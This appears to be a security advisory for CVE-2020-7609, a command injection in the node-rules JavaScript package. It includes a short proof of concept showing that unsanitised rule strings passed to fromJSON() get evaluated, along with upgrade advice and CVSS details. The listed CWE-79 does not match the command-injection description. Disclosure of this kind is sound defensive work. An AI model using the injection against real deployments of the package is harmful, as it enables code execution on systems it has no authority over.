Command Injection

Affecting node-rules package, versions >=3.0.0 <5.0.0

Report new vulnerabilities
Do your applications use this vulnerable package? Test your applications

Overview

node-rules is a light weight forward chaining Rule Engine, written in JavaScript.

Affected versions of this package are vulnerable to Command Injection. The injection point is located in line 152,153. The argument rules of function fromJSON() can be controlled by users without any sanitization.

Proof Of Concept

var A = require("node-rules");
var rules = {
  condition:"{}.__proto__.toString = 123",
  consequence:"console.log(123)"
}
var a = new A();
a.fromJSON(rules);
console.log({}.toString)

Remediation

Upgrade node-rules to version 5.0.0 or higher.

References

CVSS Score

8.1
high severity
  • Attack Vector
    Network
  • Attack Complexity
    High
  • Privileges Required
    None
  • User Interaction
    None
  • Scope
    Changed
  • Confidentiality
    High
  • Integrity
    Low
  • Availability
    Low
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:L/A:L/E:P/RL:O/RC:C
Credit
Song Li of John Hopkins University
CVE
CVE-2020-7609
CWE
CWE-79
Snyk ID
SNYK-JS-NODERULES-560426
Disclosed
10 Mar, 2020
Published
17 Mar, 2020